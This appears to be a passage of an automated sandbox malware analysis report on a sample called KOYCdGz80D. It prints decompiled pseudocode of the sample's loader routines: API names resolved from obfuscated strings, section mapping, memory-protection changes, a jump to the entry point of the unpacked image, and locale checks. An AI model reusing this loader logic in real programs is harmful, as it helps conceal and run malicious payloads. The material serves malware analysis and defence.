                              				_Unknown_base(*)()* _t29;
                              				_Unknown_base(*)()* _t33;
                              				_Unknown_base(*)()* _t36;
                              				_Unknown_base(*)()* _t39;
                              				_Unknown_base(*)()* _t42;
                              				intOrPtr _t46;
                              				struct HINSTANCE__* _t50;
                              				intOrPtr _t56;
                              
                              				_t56 = E004012E6(0x20);
                              				if(_t56 == 0) {
                              					_v8 = 8;
                              				} else {
                              					_t50 = GetModuleHandleA( *0x404184 + 0x405099);
                              					_v8 = 0x7f;
                              					_t29 = GetProcAddress(_t50,  *0x404184 + 0x4051e9);
                              					 *(_t56 + 0xc) = _t29;
                              					if(_t29 == 0) {
                              						L8:
                              						E00401BA9(_t56);
                              					} else {
                              						_t33 = GetProcAddress(_t50,  *0x404184 + 0x4051d1);
                              						 *(_t56 + 0x10) = _t33;
                              						if(_t33 == 0) {
                              							goto L8;
                              						} else {
                              							_t36 = GetProcAddress(_t50,  *0x404184 + 0x4050cc);
                              							 *(_t56 + 0x14) = _t36;
                              							if(_t36 == 0) {
                              								goto L8;
                              							} else {
                              								_t39 = GetProcAddress(_t50,  *0x404184 + 0x4050ec);
                              								 *(_t56 + 0x18) = _t39;
                              								if(_t39 == 0) {
                              									goto L8;
                              								} else {
                              									_t42 = GetProcAddress(_t50,  *0x404184 + 0x405091);
                              									 *(_t56 + 0x1c) = _t42;
                              									if(_t42 == 0) {
                              										goto L8;
                              									} else {
                              										 *((intOrPtr*)(_t56 + 8)) = _a8;
                              										 *((intOrPtr*)(_t56 + 4)) = _a4;
                              										_t46 = E0040110B(_t56, _a12); // executed
                              										_v8 = _t46;
                              										if(_t46 != 0) {
                              											goto L8;
                              										} else {
                              											 *_a16 = _t56;
                              										}
                              									}
                              								}
                              							}
                              						}
                              					}
                              				}
                              				return _v8;
                              			}

                              APIs
                                • Part of subcall function 004012E6: HeapAlloc.KERNEL32(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
                              • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
                              • GetProcAddress.KERNEL32(00000000,?), ref: 00401248
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
                              • GetProcAddress.KERNEL32(00000000,?), ref: 00401274
                              • GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
                              • GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
                                • Part of subcall function 0040110B: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,77294EE0,00000000,00000000,?), ref: 00401168
                                • Part of subcall function 0040110B: memset.NTDLL ref: 0040118A
                              Memory Dump Source
                              • Source File: 00000000.00000002.508788787.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.508788787.0000000000403000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.508788787.0000000000405000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.508788787.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                              • String ID:
                              • API String ID: 1632424568-0
                              • Opcode ID: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
                              • Instruction ID: f32f865edd81f5c961b11f374a2ae16c892bfa44bfba4a474c1bfb8eea8db87f
                              • Opcode Fuzzy Hash: ef3fb27e8fef4e2a0636531737cea3558674998f5155fbc55e035b1692bada1c
                              • Instruction Fuzzy Hash: 7C210CB4A0060BAFD710DFA9CD4495B77ECEB54314700447AEA09FB261EB74E9008B68
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 100%
                              			_entry_() {
                              				void* _t1;
                              				int _t4;
                              				int _t6;
                              
                              				_t6 = 0;
                              				_t1 = HeapCreate(0, 0x400000, 0); // executed
                              				 *0x404160 = _t1;
                              				if(_t1 != 0) {
                              					 *0x404170 = GetModuleHandleA(0);
                              					GetCommandLineW(); // executed
                              					_t4 = E004019F1(); // executed
                              					_t6 = _t4;
                              					HeapDestroy( *0x404160);
                              				}
                              				ExitProcess(_t6);
                              			}

                              APIs
                              • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 00401DEB
                              • GetModuleHandleA.KERNEL32(00000000), ref: 00401DFB
                              • GetCommandLineW.KERNEL32 ref: 00401E06
                                • Part of subcall function 004019F1: NtQuerySystemInformation.NTDLL ref: 00401A26
                                • Part of subcall function 004019F1: Sleep.KERNEL32(00000000,00000000,00000030,?,00000000), ref: 00401A6D
                                • Part of subcall function 004019F1: GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
                                • Part of subcall function 004019F1: GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
                                • Part of subcall function 004019F1: VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
                                • Part of subcall function 004019F1: GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401ADF
                                • Part of subcall function 004019F1: GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401AFD
                              • HeapDestroy.KERNEL32 ref: 00401E19
                              • ExitProcess.KERNEL32 ref: 00401E20
                              Memory Dump Source
                              • Source File: 00000000.00000002.508788787.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.508788787.0000000000403000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.508788787.0000000000405000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.508788787.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: Name$HeapLanguageLongPathSystem$CommandCreateDefaultDestroyExitHandleInfoInformationLineLocaleModuleProcessQuerySleep
                              • String ID:
                              • API String ID: 1863574965-0
                              • Opcode ID: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
                              • Instruction ID: 5d9c3f05f0f46dd7afa9dd855db83e90556071015df760abc973ca805bcb04d9
                              • Opcode Fuzzy Hash: 3f0d5e8033645e4078616d0e82c2d440b95647ac6ba795ba13239d20948eddaa
                              • Instruction Fuzzy Hash: 0BE0B6B1403220ABC7116F71BE0CA4F7E28BB89B527000539FA05F2279CB384A41CADC
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 87%
                              			E004014CF(void* __eax, void* _a4) {
                              				signed int _v8;
                              				signed int _v12;
                              				signed int _v16;
                              				long _v20;
                              				int _t42;
                              				long _t53;
                              				intOrPtr _t56;
                              				void* _t57;
                              				signed int _t59;
                              
                              				_v12 = _v12 & 0x00000000;
                              				_t56 =  *0x404180;
                              				_t57 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
                              				_v16 =  *(__eax + 6) & 0x0000ffff;
                              				VirtualProtect(_a4,  *(__eax + 0x54), _t56 - 0x43175abf,  &_v20); // executed
                              				_v8 = _v8 & 0x00000000;
                              				if(_v16 <= 0) {
                              					L12:
                              					return _v12;
                              				} else {
                              					goto L1;
                              				}
                              				while(1) {
                              					L1:
                              					_t59 = _v12;
                              					if(_t59 != 0) {
                              						goto L12;
                              					}
                              					asm("bt [esi+0x24], eax");
                              					if(_t59 >= 0) {
                              						asm("bt [esi+0x24], eax");
                              						if(__eflags >= 0) {
                              							L8:
                              							_t53 = _t56 - 0x43175abf;
                              							L9:
                              							_t42 = VirtualProtect( *((intOrPtr*)(_t57 + 0xc)) + _a4,  *(_t57 + 8), _t53,  &_v20); // executed
                              							if(_t42 == 0) {
                              								_v12 = GetLastError();
                              							}
                              							_t57 = _t57 + (_t56 - 0x3175ac2) * 0x28;
                              							_v8 = _v8 + 1;
                              							if(_v8 < _v16) {
                              								continue;
                              							} else {
                              								goto L12;
                              							}
                              						}
                              						asm("bt [esi+0x24], eax");
                              						_t53 = _t56 - 0x43175ac1;
                              						if(__eflags >= 0) {
                              							goto L9;
                              						}
                              						goto L8;
                              					}
                              					asm("bt [esi+0x24], eax");
                              					if(_t59 >= 0) {
                              						_t53 = _t56 - 0x43175aa3;
                              					} else {
                              						_t53 = _t56 - 0x43175a83;
                              					}
                              					goto L9;
                              				}
                              				goto L12;
                              			}

                              APIs
                              • VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
                              • VirtualProtect.KERNEL32(00000000,?,?,?), ref: 0040157D
                              • GetLastError.KERNEL32 ref: 00401583
                              Memory Dump Source
                              • Source File: 00000000.00000002.508788787.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.508788787.0000000000403000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.508788787.0000000000405000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.508788787.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: ProtectVirtual$ErrorLast
                              • String ID:
                              • API String ID: 1469625949-0
                              • Opcode ID: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
                              • Instruction ID: db8870d9979c58085381c8b0541bfb0d1fdb36fbc34c572f0fe0e58abbf4653c
                              • Opcode Fuzzy Hash: fa1f72f039ba5afec073a1f2adf273f2725f5d9d4501c0cfce72b6ba3d5ab017
                              • Instruction Fuzzy Hash: D1212B7280121AEFCB14CF95C9819AAF7B4FF58305F04487AE413AB960E738AA55CF58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • ___initmbctable.LIBCMT ref: 0040F57F
                                • Part of subcall function 00410330: __setmbcp.LIBCMT ref: 0041033B
                              Memory Dump Source
                              • Source File: 00000000.00000002.508875869.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_40f000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: ___initmbctable__setmbcp

                              Control-flow Graph

                              C-Code - Quality: 100%
                              			E0040139F() {
                              				char _v16;
                              				intOrPtr _v28;
                              				void _v32;
                              				void* _v36;
                              				intOrPtr _t15;
                              				void* _t16;
                              				long _t25;
                              				int _t26;
                              				void* _t30;
                              				intOrPtr* _t32;
                              				signed int _t35;
                              				intOrPtr _t38;
                              
                              				_t15 =  *0x404184;
                              				if( *0x40416c > 5) {
                              					_t16 = _t15 + 0x40513c;
                              				} else {
                              					_t16 = _t15 + 0x40529c;
                              				}
                              				E00401D3C(_t16, _t16);
                              				_t35 = 6;
                              				memset( &_v32, 0, _t35 << 2);
                              				if(E00401882( &_v32,  &_v16,  *0x404180 ^ 0xdd0210cf) == 0) {
                              					_t25 = 0xb;
                              				} else {
                              					_t26 = lstrlenW( *0x404178);
                              					_t8 = _t26 + 2; // 0x2
                              					_t11 = _t26 + _t8 + 8; // 0xa
                              					_t30 = E004015B0(_t38, _t11,  &_v32,  &_v36); // executed
                              					if(_t30 == 0) {
                              						_t32 = _v36;
                              						 *_t32 = 0;
                              						if( *0x404178 == 0) {
                              							 *((short*)(_t32 + 4)) = 0;
                              						} else {
                              							L00401FE6(_t32 + 4);
                              						}
                              					}
                              					_t25 = E004012FB(_v28); // executed
                              				}
                              				ExitThread(_t25);
                              			}

                              Memory Dump Source
                              • Source File: 00000000.00000002.508788787.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.508788787.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.508788787.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.508788787.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: ExitThreadlstrlen

                              Control-flow Graph

                              APIs
                              • RtlAllocateHeap.NTDLL(00000008,?), ref: 00410A99
                              Memory Dump Source
                              • Source File: 00000000.00000002.508875869.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_40f000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: AllocateHeap

                              Control-flow Graph

                              C-Code - Quality: 37%
                              			E00401D3C(void* __eax, intOrPtr _a4) {
                              
                              				 *0x404190 =  *0x404190 & 0x00000000;
                              				_push(0);
                              				_push(0x40418c);
                              				_push(1);
                              				_push(_a4);
                              				 *0x404188 = 0xc; // executed
                              				L00401682(); // executed
                              				return __eax;
                              			}

                              APIs
                              • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(004013CC,00000001,0040418C,00000000), ref: 00401D5A
                              Memory Dump Source
                              • Source File: 00000000.00000002.508788787.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.508788787.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.508788787.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.508788787.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: DescriptorSecurity$ConvertString

                              Control-flow Graph

                              C-Code - Quality: 86%
                              			E004012FB(void* __eax) {
                              				char _v8;
                              				void* _v12;
                              				void* __edi;
                              				void* _t18;
                              				long _t24;
                              				long _t26;
                              				long _t29;
                              				intOrPtr _t40;
                              				void* _t41;
                              				intOrPtr* _t42;
                              				void* _t44;
                              
                              				_t41 = __eax;
                              				_t16 =  *0x404180;
                              				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4);
                              				_t18 = E00401202( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x404180 - 0x43174ac4 &  !( *0x404180 - 0x43174ac4), _t16 + 0xbce8a57d,  &_v8,  &_v12); // executed
                              				if(_t18 != 0) {
                              					_t29 = 8;
                              					goto L8;
                              				} else {
                              					_t40 = _v8;
                              					_t29 = E00401BC4(_t33, _t40, _t41);
                              					if(_t29 == 0) {
                              						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                              						_t24 = E00401000(_t40, _t44); // executed
                              						_t29 = _t24;
                              						if(_t29 == 0) {
                              							_t26 = E004014CF(_t44, _t40); // executed
                              							_t29 = _t26;
                              							if(_t29 == 0) {
                              								_push(_t26);
                              								_push(1);
                              								_push(_t40);
                              								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                              									_t29 = GetLastError();
                              								}
                              							}
                              						}
                              					}
                              					_t42 = _v12;
                              					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                              					E00401BA9(_t42);
                              					L8:
                              					return _t29;
                              				}
                              			}

                              APIs
                                • Part of subcall function 00401202: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,00401337,?,?,?,?,?,00000002,?,?), ref: 00401226
                                • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401248
                                • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040125E
                                • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 00401274
                                • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 0040128A
                                • Part of subcall function 00401202: GetProcAddress.KERNEL32(00000000,?), ref: 004012A0
                                • Part of subcall function 00401000: LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 00401038
                                • Part of subcall function 004014CF: VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000000,?,?), ref: 00401508
                                • Part of subcall function 004014CF: VirtualProtect.KERNEL32(00000000,?,?,?), ref: 0040157D
                                • Part of subcall function 004014CF: GetLastError.KERNEL32 ref: 00401583
                              • GetLastError.KERNEL32(?,?), ref: 00401379
                              Memory Dump Source
                              • Source File: 00000000.00000002.508788787.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.508788787.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.508788787.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.508788787.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule

                              Control-flow Graph

                              APIs
                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 008253B5
                              Memory Dump Source
                              • Source File: 00000000.00000002.509300056.0000000000820000.00000040.00000020.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_820000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: AllocVirtual

                              C-Code - Quality: 100%
                              			E00401D68() {
                              				void* _t1;
                              				unsigned int _t3;
                              				void* _t4;
                              				long _t5;
                              				void* _t6;
                              				intOrPtr _t10;
                              				void* _t14;
                              
                              				_t10 =  *0x404170;
                              				_t1 = CreateEventA(0, 1, 0, 0);
                              				 *0x40417c = _t1;
                              				if(_t1 == 0) {
                              					return GetLastError();
                              				}
                              				_t3 = GetVersion();
                              				if(_t3 != 5) {
                              					L4:
                              					if(_t14 <= 0) {
                              						_t4 = 0x32;
                              						return _t4;
                              					} else {
                              						goto L5;
                              					}
                              				} else {
                              					if(_t3 >> 8 > 0) {
                              						L5:
                              						 *0x40416c = _t3;
                              						_t5 = GetCurrentProcessId();
                              						 *0x404168 = _t5;
                              						 *0x404170 = _t10;
                              						_t6 = OpenProcess(0x10047a, 0, _t5);
                              						 *0x404164 = _t6;
                              						if(_t6 == 0) {
                              							 *0x404164 =  *0x404164 | 0xffffffff;
                              						}
                              						return 0;
                              					} else {
                              						_t14 = _t3 - _t3;
                              						goto L4;
                              					}
                              				}
                              			}

                              APIs
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
                              • GetVersion.KERNEL32 ref: 00401D86
                              • GetCurrentProcessId.KERNEL32 ref: 00401DA2
                              • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
                              Memory Dump Source
                              • Source File: 00000000.00000002.508788787.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.508788787.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.508788787.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.508788787.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: Process$CreateCurrentEventOpenVersion

                              Memory Dump Source
                              • Source File: 00000000.00000002.508875869.000000000040F000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040F000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_40f000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: __aulldvrm